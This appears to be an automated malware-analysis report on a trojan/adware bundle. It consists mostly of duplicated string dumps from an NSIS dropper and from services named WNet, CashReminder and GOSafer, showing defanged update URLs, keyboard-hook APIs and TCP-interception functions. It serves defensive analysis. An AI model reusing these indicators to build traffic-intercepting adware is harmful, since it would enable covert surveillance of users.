.........W..8......9t.D........V.d)...s.. ..4.v~r{~..*..&..}............D../TE.t.&V.e.........l..1........y...--=|~..z..3j1..\..<..~..6.[.Z}'.@.0l._...,r..T...W.K.<.<m...;z...k.=F..5........|Z..g.!......p...!.
<<< skipped >>>
Map
The Trojan connects to the servers at the folowing location(s):
Strings from Dumps
%original file name%.exe_1512:
.text
.text
`.rdata
`.rdata
@.data
@.data
.ndata
.ndata
.rsrc
.rsrc
uDSSh
uDSSh
.DEFAULT\Control Panel\International
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
GetWindowsDirectoryA
KERNEL32.dll
KERNEL32.dll
ExitWindowsEx
ExitWindowsEx
USER32.dll
USER32.dll
GDI32.dll
GDI32.dll
SHFileOperationA
SHFileOperationA
ShellExecuteA
ShellExecuteA
SHELL32.dll
SHELL32.dll
RegEnumKeyA
RegEnumKeyA
RegCreateKeyExA
RegCreateKeyExA
RegCloseKey
RegCloseKey
RegDeleteKeyA
RegDeleteKeyA
RegOpenKeyExA
RegOpenKeyExA
ADVAPI32.dll
ADVAPI32.dll
COMCTL32.dll
COMCTL32.dll
ole32.dll
ole32.dll
VERSION.dll
VERSION.dll
verifying installer: %d%%
verifying installer: %d%%
unpacking data: %d%%
unpacking data: %d%%
... %d%%
... %d%%
hXXp://nsis.sf.net/NSIS_Error
hXXp://nsis.sf.net/NSIS_Error
~nsu.tmp
~nsu.tmp
%u.%u%s%s
%u.%u%s%s
RegDeleteKeyExA
RegDeleteKeyExA
%s=%s
%s=%s
*?|/":
*?|/":
ShowWebInPopUp
ShowWebInPopUp
pData\Local\Temp\nscD154.tmp\nsWeb.dll
pData\Local\Temp\nscD154.tmp\nsWeb.dll
ai7Qvtg3CvT78vSMa0N0LPai7Qvt\g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_gs.exe
ai7Qvtg3CvT78vSMa0N0LPai7Qvt\g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_gs.exe
t.com/index.php /ta /ci 9664 /i MyBestOffersTodayBR
t.com/index.php /ta /ci 9664 /i MyBestOffersTodayBR
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nscD154.tmp\nsWeb.dll
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nscD154.tmp\nsWeb.dll
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nscD154.tmp
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nscD154.tmp
n%D,3
n%D,3
GetProcessHeap
GetProcessHeap
OLEAUT32.dll
OLEAUT32.dll
CreateURLMoniker
CreateURLMoniker
urlmon.dll
urlmon.dll
WININET.dll
WININET.dll
nsWeb.dll
nsWeb.dll
ShowWebInPage
ShowWebInPage
MSHTML.DLL
MSHTML.DLL
1 1$1(1,1014181
1 1$1(1,1014181
t%SSj
t%SSj
GetWindowsDirectoryW
GetWindowsDirectoryW
RegEnumKeyExW
RegEnumKeyExW
RegEnumKeyExA
RegEnumKeyExA
RegCreateKeyExW
RegCreateKeyExW
RegOpenKeyExW
RegOpenKeyExW
RegDeleteKeyW
RegDeleteKeyW
registry.dll
registry.dll
_CopyKey
_CopyKey
_CreateKey
_CreateKey
_DeleteKey
_DeleteKey
_DeleteKeyEmpty
_DeleteKeyEmpty
_KeyExists
_KeyExists
_MoveKey
_MoveKey
_RestoreKey
_RestoreKey
_SaveKey
_SaveKey
.reloc
.reloc
System.dll
System.dll
callback%d
callback%d
@.reloc
@.reloc
8%ud'
8%ud'
.bu)o&
.bu)o&
g\=.jeD
g\=.jeD
nscD154.tmp
nscD154.tmp
pData\Local\Temp\nscD154.tmp
pData\Local\Temp\nscD154.tmp
00663296
00663296
c:\%original file name%.exe
c:\%original file name%.exe
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\Og3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\Og3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt
%original file name%.exe
%original file name%.exe
ers\"%CurrentUserName%"\AppData\Local\Temp\nsmD142.tmp
ers\"%CurrentUserName%"\AppData\Local\Temp\nsmD142.tmp
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\
-2046754816
-2046754816
-2147410511
-2147410511
Nullsoft Install System v2.46
Nullsoft Install System v2.46
HKEY_DYN_DATA
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
HKEY_CURRENT_CONFIG
HKEY_PERFORMANCE_DATA
HKEY_PERFORMANCE_DATA
HKEY_USERS
HKEY_USERS
HKEY_LOCAL_MACHINE
HKEY_LOCAL_MACHINE
HKEY_CURRENT_USER
HKEY_CURRENT_USER
HKEY_CLASSES_ROOT
HKEY_CLASSES_ROOT
%s /s "%s"
%s /s "%s"
regedit.exe
regedit.exe
REG_KEY
REG_KEY
%s%s%s
%s%s%s
x,
x,
=hex(%x):
=hex(%x):
=dword:x
=dword:x
="%s"
="%s"
[%s\%s]
[%s\%s]
[-%s\%s]
[-%s\%s]
Windows Registry Editor Version 5.00
Windows Registry Editor Version 5.00
5.9.1.7
5.9.1.7
%original file name%.exe_1512_rwx_003F4000_00001000:
callback%d
callback%d
g3CvT78vSMa0N0LPai7Qvt_mb_1.exe_1884:
.text
.text
`.rdata
`.rdata
@.data
@.data
.ndata
.ndata
.rsrc
.rsrc
uDSSh
uDSSh
.DEFAULT\Control Panel\International
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
GetWindowsDirectoryA
KERNEL32.dll
KERNEL32.dll
ExitWindowsEx
ExitWindowsEx
USER32.dll
USER32.dll
GDI32.dll
GDI32.dll
SHFileOperationA
SHFileOperationA
ShellExecuteA
ShellExecuteA
SHELL32.dll
SHELL32.dll
RegEnumKeyA
RegEnumKeyA
RegCreateKeyExA
RegCreateKeyExA
RegCloseKey
RegCloseKey
RegDeleteKeyA
RegDeleteKeyA
RegOpenKeyExA
RegOpenKeyExA
ADVAPI32.dll
ADVAPI32.dll
COMCTL32.dll
COMCTL32.dll
ole32.dll
ole32.dll
VERSION.dll
VERSION.dll
verifying installer: %d%%
verifying installer: %d%%
unpacking data: %d%%
unpacking data: %d%%
... %d%%
... %d%%
hXXp://nsis.sf.net/NSIS_Error
hXXp://nsis.sf.net/NSIS_Error
~nsu.tmp
~nsu.tmp
%u.%u%s%s
%u.%u%s%s
RegDeleteKeyExA
RegDeleteKeyExA
%s=%s
%s=%s
*?|/":
*?|/":
ShowWebInPopUp
ShowWebInPopUp
pData\Local\Temp\nssD4BE.tmp\nsWeb.dll
pData\Local\Temp\nssD4BE.tmp\nsWeb.dll
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssD4BE.tmp\nsWeb.dll
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssD4BE.tmp\nsWeb.dll
%Program Files%
%Program Files%
\nsWeb.dll
\nsWeb.dll
hXXp://goo.gl/Bw14Po
hXXp://goo.gl/Bw14Po
$$\wininit.ini
$$\wininit.ini
@.reloc
@.reloc
n%D,3
n%D,3
GetProcessHeap
GetProcessHeap
OLEAUT32.dll
OLEAUT32.dll
CreateURLMoniker
CreateURLMoniker
urlmon.dll
urlmon.dll
WININET.dll
WININET.dll
nsWeb.dll
nsWeb.dll
ShowWebInPage
ShowWebInPage
MSHTML.DLL
MSHTML.DLL
1 1$1(1,1014181
1 1$1(1,1014181
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssD4BE.tmp
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssD4BE.tmp
nssD4BE.tmp
nssD4BE.tmp
:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssD4BE.tmp
:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssD4BE.tmp
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\Og3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt\g3CvT78vSMa0N0LPai7Qvt_mb_1.exe
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\Og3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt\g3CvT78vSMa0N0LPai7Qvt_mb_1.exe
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\O15O8WbPqkjNWDUfU8L4Mr8GpVb15O8WbPqkjNWDUfU8L4Mr8GpVb
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\O15O8WbPqkjNWDUfU8L4Mr8GpVb15O8WbPqkjNWDUfU8L4Mr8GpVb
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\Og3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\Og3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt
g3CvT78vSMa0N0LPai7Qvt_mb_1.exe
g3CvT78vSMa0N0LPai7Qvt_mb_1.exe
ers\"%CurrentUserName%"\AppData\Local\Temp\nscD4AC.tmp
ers\"%CurrentUserName%"\AppData\Local\Temp\nscD4AC.tmp
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\
8.9.3.9
8.9.3.9
WNet.exe_3080:
.idata
.idata
.rdata
.rdata
P.reloc
P.reloc
P.rsrc
P.rsrc
kernel32.dll
kernel32.dll
Windows
Windows
MSWHEEL_ROLLMSG
MSWHEEL_ROLLMSG
MSH_WHEELSUPPORT_MSG
MSH_WHEELSUPPORT_MSG
MSH_SCROLL_LINES_MSG
MSH_SCROLL_LINES_MSG
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
oleaut32.dll
oleaut32.dll
EVariantBadIndexError
EVariantBadIndexError
ssShift
ssShift
htKeyword
htKeyword
EInvalidOperation
EInvalidOperation
u%CNu
u%CNu
%s[%d]
%s[%d]
%s_%d
%s_%d
EInvalidGraphicOperation
EInvalidGraphicOperation
USER32.DLL
USER32.DLL
comctl32.dll
comctl32.dll
uxtheme.dll
uxtheme.dll
%s%s%s%s%s%s%s%s%s%s
%s%s%s%s%s%s%s%s%s%s
Proportional
Proportional
MAPI32.DLL
MAPI32.DLL
TURLAction
TURLAction
HelpKeywordp
HelpKeywordp
TURLDownloadStatus
TURLDownloadStatus
dsBeginSyncOperation
dsBeginSyncOperation
dsEndSyncOperation
dsEndSyncOperation
dsFilterReportMIMEType
dsFilterReportMIMEType
TDownLoadURL
TDownLoadURL
URLMON.DLL
URLMON.DLL
URLDownloadToFileA
URLDownloadToFileA
OnKeyDown
OnKeyDown
OnKeyPress
OnKeyPress
OnKeyUp
OnKeyUp
IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")
IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")
JumpID("","%s")
JumpID("","%s")
TKeyEvent
TKeyEvent
TKeyPressEvent
TKeyPressEvent
HelpKeywordT
HelpKeywordT
crSQLWait
crSQLWait
%s (%s)
%s (%s)
imm32.dll
imm32.dll
AutoHotkeys
AutoHotkeys
ssHotTrack
ssHotTrack
TWindowState
TWindowState
poProportional
poProportional
TWMKey
TWMKey
KeyPreview
KeyPreview
WindowState
WindowState
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
vcltest3.dll
vcltest3.dll
User32.dll
User32.dll
Password
Password
OnExecutepWE
OnExecutepWE
127.0.0.1
127.0.0.1
255.0.0.0
255.0.0.0
ServiceExecute
ServiceExecute
\P_CheckUpdate.txt
\P_CheckUpdate.txt
NOVA UPDATE DISPONIVEL! URL:
NOVA UPDATE DISPONIVEL! URL:
\po_update.exe
\po_update.exe
hXXp://VVV.brsoftwarellc.com/services/rules.txt?dummy=
hXXp://VVV.brsoftwarellc.com/services/rules.txt?dummy=
hXXp://VVV.brsoftwarellc.com/services/update.php?v=
hXXp://VVV.brsoftwarellc.com/services/update.php?v=
&key=
&key=
\P_RuleList.txt
\P_RuleList.txt
[E] ProductKey :
[E] ProductKey :
[N] ProductKey :
[N] ProductKey :
cmd.exe /c net start WNet
cmd.exe /c net start WNet
cmd.exe /c net stop WNet
cmd.exe /c net stop WNet
user32.dll
user32.dll
GetKeyboardType
GetKeyboardType
advapi32.dll
advapi32.dll
RegOpenKeyExA
RegOpenKeyExA
RegCloseKey
RegCloseKey
ReportEventA
ReportEventA
RegFlushKey
RegFlushKey
RegCreateKeyExA
RegCreateKeyExA
WinExec
WinExec
GetCPInfo
GetCPInfo
version.dll
version.dll
gdi32.dll
gdi32.dll
SetViewportOrgEx
SetViewportOrgEx
UnhookWindowsHookEx
UnhookWindowsHookEx
SetWindowsHookExA
SetWindowsHookExA
MsgWaitForMultipleObjects
MsgWaitForMultipleObjects
MapVirtualKeyA
MapVirtualKeyA
LoadKeyboardLayoutA
LoadKeyboardLayoutA
GetKeyboardState
GetKeyboardState
GetKeyboardLayoutList
GetKeyboardLayoutList
GetKeyboardLayout
GetKeyboardLayout
GetKeyState
GetKeyState
GetKeyNameTextA
GetKeyNameTextA
EnumWindows
EnumWindows
EnumThreadWindows
EnumThreadWindows
ActivateKeyboardLayout
ActivateKeyboardLayout
wsock32.dll
wsock32.dll
nfapi.dll
nfapi.dll
nf_tcpDisableFiltering
nf_tcpDisableFiltering
nf_setTCPTimeout
nf_setTCPTimeout
nf_tcpClose
nf_tcpClose
nf_tcpPostReceive
nf_tcpPostReceive
nf_tcpPostSend
nf_tcpPostSend
nf_tcpSetConnectionState
nf_tcpSetConnectionState
psapi.dll
psapi.dll
ProtocolFilters.dll
ProtocolFilters.dll
5l6O6W6
5l6O6W6
?!?%?)?-?1?5?9?=?
?!?%?)?-?1?5?9?=?
5%6x6
5%6x6
1 1$1(1,1014181
1 1$1(1,1014181
0&0.080=0
0&0.080=0
2%3)3-31383
2%3)3-31383
; ;$;(;,;0;4;8;
; ;$;(;,;0;4;8;
1#1'1 1/13171;1
1#1'1 1/13171;1
=!=,=7=?=_=
=!=,=7=?=_=
5 5$5(5,505
5 5$5(5,505
3 3$3(3,3
3 3$3(3,3
3 3$3(3,3034383
3 3$3(3,3034383
333333333333333333
333333333333333333
33333833
33333833
3333339
3333339
3333333333333338
3333333333333338
:*"*"$3338
:*"*"$3338
3333333
3333333
33333333
33333333
33333333333
33333333333
3333333333338
3333333333338
33338?383
33338?383
333333333333
333333333333
:*3:"$3338
:*3:"$3338
333333333333333
333333333333333
I<.os8>
I<.os8>
KWindows
KWindows
UrlMon
UrlMon
OnExecute
OnExecute
No help keyword specified.
No help keyword specified.
No help found for %s#No context-sensitive help installed$No topic-based help system installed
No help found for %s#No context-sensitive help installed$No topic-based help system installed
shutdown(Service failed in custom message(%d): %s
shutdown(Service failed in custom message(%d): %s
Service installed successfully/Service "%s" failed to install with error: "%s" Service uninstalled successfully1Service "%s" failed to uninstall with error: "%s"
Service installed successfully/Service "%s" failed to install with error: "%s" Service uninstalled successfully1Service "%s" failed to uninstall with error: "%s"
Error downloading URL: %s
Error downloading URL: %s
Unable to load %s"Unable to find a Table of Contents
Unable to load %s"Unable to find a Table of Contents
Alt Clipboard does not support Icons
Alt Clipboard does not support Icons
Cannot open clipboard/Menu '%s' is already being used by another form
Cannot open clipboard/Menu '%s' is already being used by another form
Service failed on %s: %s
Service failed on %s: %s
Unsupported clipboard format
Unsupported clipboard format
Error creating window class Cannot focus a disabled or invisible window!Control '%s' has no parent window
Error creating window class Cannot focus a disabled or invisible window!Control '%s' has no parent window
Error reading %s%s%s: %s
Error reading %s%s%s: %s
Failed to get data for '%s'
Failed to get data for '%s'
Failed to set data for '%s'
Failed to set data for '%s'
Resource %s not found
Resource %s not found
%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration group
%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration group
Property %s does not exist
Property %s does not exist
Thread creation error: %s
Thread creation error: %s
Thread Error: %s (%d)
Thread Error: %s (%d)
Class %s not found
Class %s not found
A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates
A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates
Cannot create file "%s". %s
Cannot create file "%s". %s
Cannot open file "%s". %s
Cannot open file "%s". %s
Invalid stream format$''%s'' is not a valid component name
Invalid stream format$''%s'' is not a valid component name
Invalid data type for '%s' List capacity out of bounds (%d)
Invalid data type for '%s' List capacity out of bounds (%d)
List count out of bounds (%d)
List count out of bounds (%d)
List index out of bounds (%d)
List index out of bounds (%d)
Ancestor for '%s' not found
Ancestor for '%s' not found
Cannot assign a %s to a %s
Cannot assign a %s to a %s
Bits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main thread
Bits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main thread
%s (%s, line %d)
%s (%s, line %d)
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
System Error. Code: %d.
System Error. Code: %d.
Invalid variant operation%Invalid variant operation (%s%.8x)
Invalid variant operation%Invalid variant operation (%s%.8x)
%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
Operation not supported
Operation not supported
External exception %x
External exception %x
Interface not supported
Interface not supported
Invalid pointer operation
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Invalid class typecast0Access violation at address %p. %s of address %p
Privileged instruction(Exception %s in module %s at %p.
Privileged instruction(Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'"Variant method calls not supported
No argument for format '%s'"Variant method calls not supported
!'%s' is not a valid integer value
!'%s' is not a valid integer value
I/O error %d
I/O error %d
Integer overflow Invalid floating point operation
Integer overflow Invalid floating point operation
CashReminder.exe_1108:
.idata
.idata
.rdata
.rdata
P.reloc
P.reloc
P.rsrc
P.rsrc
kernel32.dll
kernel32.dll
Windows
Windows
MSWHEEL_ROLLMSG
MSWHEEL_ROLLMSG
MSH_WHEELSUPPORT_MSG
MSH_WHEELSUPPORT_MSG
MSH_SCROLL_LINES_MSG
MSH_SCROLL_LINES_MSG
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
oleaut32.dll
oleaut32.dll
EVariantBadIndexError
EVariantBadIndexError
ssShift
ssShift
htKeyword
htKeyword
EInvalidOperation
EInvalidOperation
u%CNu
u%CNu
%s[%d]
%s[%d]
%s_%d
%s_%d
EInvalidGraphicOperation
EInvalidGraphicOperation
USER32.DLL
USER32.DLL
comctl32.dll
comctl32.dll
uxtheme.dll
uxtheme.dll
%s%s%s%s%s%s%s%s%s%s
%s%s%s%s%s%s%s%s%s%s
Proportional
Proportional
MAPI32.DLL
MAPI32.DLL
TURLAction
TURLAction
HelpKeywordp
HelpKeywordp
TURLDownloadStatus
TURLDownloadStatus
dsBeginSyncOperation
dsBeginSyncOperation
dsEndSyncOperation
dsEndSyncOperation
dsFilterReportMIMEType
dsFilterReportMIMEType
TDownLoadURL
TDownLoadURL
URLMON.DLL
URLMON.DLL
URLDownloadToFileA
URLDownloadToFileA
OnKeyDown
OnKeyDown
OnKeyPress
OnKeyPress
OnKeyUp
OnKeyUp
IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")
IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")
JumpID("","%s")
JumpID("","%s")
TKeyEvent
TKeyEvent
TKeyPressEvent
TKeyPressEvent
HelpKeywordT
HelpKeywordT
crSQLWait
crSQLWait
%s (%s)
%s (%s)
imm32.dll
imm32.dll
AutoHotkeys
AutoHotkeys
ssHotTrack
ssHotTrack
TWindowState
TWindowState
poProportional
poProportional
TWMKey
TWMKey
KeyPreview
KeyPreview
WindowState
WindowState
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
vcltest3.dll
vcltest3.dll
User32.dll
User32.dll
Password
Password
OnExecutepWE
OnExecutepWE
content-security-policy-report-only
content-security-policy-report-only
127.0.0.1
127.0.0.1
255.0.0.0
255.0.0.0
ServiceExecute
ServiceExecute
\P_StoreList.txt
\P_StoreList.txt
\P_CheckUpdate.txt
\P_CheckUpdate.txt
\cr_update.exe
\cr_update.exe
hXXp://VVV.related.deals/services/rules?dummy=
hXXp://VVV.related.deals/services/rules?dummy=
hXXp://VVV.related.deals/services/stores?dummy=
hXXp://VVV.related.deals/services/stores?dummy=
hXXp://VVV.related.deals/services/update/
hXXp://VVV.related.deals/services/update/
\P_RuleList.txt
\P_RuleList.txt
[N] ProductKey :
[N] ProductKey :
cmd.exe /c net start CashReminder
cmd.exe /c net start CashReminder
cmd.exe /c net stop CashReminder
cmd.exe /c net stop CashReminder
user32.dll
user32.dll
GetKeyboardType
GetKeyboardType
advapi32.dll
advapi32.dll
RegOpenKeyExA
RegOpenKeyExA
RegCloseKey
RegCloseKey
ReportEventA
ReportEventA
RegFlushKey
RegFlushKey
RegCreateKeyExA
RegCreateKeyExA
WinExec
WinExec
GetCPInfo
GetCPInfo
version.dll
version.dll
gdi32.dll
gdi32.dll
SetViewportOrgEx
SetViewportOrgEx
UnhookWindowsHookEx
UnhookWindowsHookEx
SetWindowsHookExA
SetWindowsHookExA
MsgWaitForMultipleObjects
MsgWaitForMultipleObjects
MapVirtualKeyA
MapVirtualKeyA
LoadKeyboardLayoutA
LoadKeyboardLayoutA
GetKeyboardState
GetKeyboardState
GetKeyboardLayoutList
GetKeyboardLayoutList
GetKeyboardLayout
GetKeyboardLayout
GetKeyState
GetKeyState
GetKeyNameTextA
GetKeyNameTextA
EnumWindows
EnumWindows
EnumThreadWindows
EnumThreadWindows
ActivateKeyboardLayout
ActivateKeyboardLayout
wsock32.dll
wsock32.dll
nfapi.dll
nfapi.dll
nf_tcpDisableFiltering
nf_tcpDisableFiltering
nf_setTCPTimeout
nf_setTCPTimeout
nf_tcpClose
nf_tcpClose
nf_tcpPostReceive
nf_tcpPostReceive
nf_tcpPostSend
nf_tcpPostSend
nf_tcpSetConnectionState
nf_tcpSetConnectionState
psapi.dll
psapi.dll
ProtocolFilters.dll
ProtocolFilters.dll
5l6O6W6
5l6O6W6
?!?%?)?-?1?5?9?=?
?!?%?)?-?1?5?9?=?
5%6x6
5%6x6
1 1$1(1,1014181
1 1$1(1,1014181
0&0.080=0
0&0.080=0
2%3)3-31383
2%3)3-31383
; ;$;(;,;0;4;8;
; ;$;(;,;0;4;8;
1#1'1 1/13171;1
1#1'1 1/13171;1
=!=,=7=?=_=
=!=,=7=?=_=
5 5$5(5,505
5 5$5(5,505
3 3$3(3,3
3 3$3(3,3
3 3$3(3,3034383
3 3$3(3,3034383
333333333333333333
333333333333333333
33333833
33333833
3333339
3333339
3333333333333338
3333333333333338
:*"*"$3338
:*"*"$3338
3333333
3333333
33333333
33333333
33333333333
33333333333
3333333333338
3333333333338
33338?383
33338?383
333333333333
333333333333
:*3:"$3338
:*3:"$3338
333333333333333
333333333333333
KWindows
KWindows
UrlMon
UrlMon
OnExecute
OnExecute
No help keyword specified.
No help keyword specified.
No help found for %s#No context-sensitive help installed$No topic-based help system installed
No help found for %s#No context-sensitive help installed$No topic-based help system installed
shutdown(Service failed in custom message(%d): %s
shutdown(Service failed in custom message(%d): %s
Service installed successfully/Service "%s" failed to install with error: "%s" Service uninstalled successfully1Service "%s" failed to uninstall with error: "%s"
Service installed successfully/Service "%s" failed to install with error: "%s" Service uninstalled successfully1Service "%s" failed to uninstall with error: "%s"
Error downloading URL: %s
Error downloading URL: %s
Unable to load %s"Unable to find a Table of Contents
Unable to load %s"Unable to find a Table of Contents
Alt Clipboard does not support Icons
Alt Clipboard does not support Icons
Cannot open clipboard/Menu '%s' is already being used by another form
Cannot open clipboard/Menu '%s' is already being used by another form
Service failed on %s: %s
Service failed on %s: %s
Unsupported clipboard format
Unsupported clipboard format
Error creating window class Cannot focus a disabled or invisible window!Control '%s' has no parent window
Error creating window class Cannot focus a disabled or invisible window!Control '%s' has no parent window
Error reading %s%s%s: %s
Error reading %s%s%s: %s
Failed to get data for '%s'
Failed to get data for '%s'
Failed to set data for '%s'
Failed to set data for '%s'
Resource %s not found
Resource %s not found
%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration group
%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration group
Property %s does not exist
Property %s does not exist
Thread creation error: %s
Thread creation error: %s
Thread Error: %s (%d)
Thread Error: %s (%d)
Class %s not found
Class %s not found
A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates
A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates
Cannot create file "%s". %s
Cannot create file "%s". %s
Cannot open file "%s". %s
Cannot open file "%s". %s
Invalid stream format$''%s'' is not a valid component name
Invalid stream format$''%s'' is not a valid component name
Invalid data type for '%s' List capacity out of bounds (%d)
Invalid data type for '%s' List capacity out of bounds (%d)
List count out of bounds (%d)
List count out of bounds (%d)
List index out of bounds (%d)
List index out of bounds (%d)
Ancestor for '%s' not found
Ancestor for '%s' not found
Cannot assign a %s to a %s
Cannot assign a %s to a %s
Bits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main thread
Bits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main thread
%s (%s, line %d)
%s (%s, line %d)
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
System Error. Code: %d.
System Error. Code: %d.
Invalid variant operation%Invalid variant operation (%s%.8x)
Invalid variant operation%Invalid variant operation (%s%.8x)
%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
Operation not supported
Operation not supported
External exception %x
External exception %x
Interface not supported
Interface not supported
Invalid pointer operation
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Invalid class typecast0Access violation at address %p. %s of address %p
Privileged instruction(Exception %s in module %s at %p.
Privileged instruction(Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'"Variant method calls not supported
No argument for format '%s'"Variant method calls not supported
!'%s' is not a valid integer value
!'%s' is not a valid integer value
I/O error %d
I/O error %d
Integer overflow Invalid floating point operation
Integer overflow Invalid floating point operation
GOSafer.exe_3284:
.idata
.idata
.rdata
.rdata
P.reloc
P.reloc
P.rsrc
P.rsrc
kernel32.dll
kernel32.dll
Windows
Windows
MSWHEEL_ROLLMSG
MSWHEEL_ROLLMSG
MSH_WHEELSUPPORT_MSG
MSH_WHEELSUPPORT_MSG
MSH_SCROLL_LINES_MSG
MSH_SCROLL_LINES_MSG
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
oleaut32.dll
oleaut32.dll
EVariantBadIndexError
EVariantBadIndexError
ssShift
ssShift
htKeyword
htKeyword
EInvalidOperation
EInvalidOperation
u%CNu
u%CNu
%s[%d]
%s[%d]
%s_%d
%s_%d
EInvalidGraphicOperation
EInvalidGraphicOperation
USER32.DLL
USER32.DLL
comctl32.dll
comctl32.dll
uxtheme.dll
uxtheme.dll
%s%s%s%s%s%s%s%s%s%s
%s%s%s%s%s%s%s%s%s%s
Proportional
Proportional
MAPI32.DLL
MAPI32.DLL
TURLAction
TURLAction
HelpKeywordp
HelpKeywordp
TURLDownloadStatus
TURLDownloadStatus
dsBeginSyncOperation
dsBeginSyncOperation
dsEndSyncOperation
dsEndSyncOperation
dsFilterReportMIMEType
dsFilterReportMIMEType
TDownLoadURL
TDownLoadURL
URLMON.DLL
URLMON.DLL
URLDownloadToFileA
URLDownloadToFileA
OnKeyDown
OnKeyDown
OnKeyPress
OnKeyPress
OnKeyUp
OnKeyUp
IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")
IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")
JumpID("","%s")
JumpID("","%s")
TKeyEvent
TKeyEvent
TKeyPressEvent
TKeyPressEvent
HelpKeywordT
HelpKeywordT
crSQLWait
crSQLWait
%s (%s)
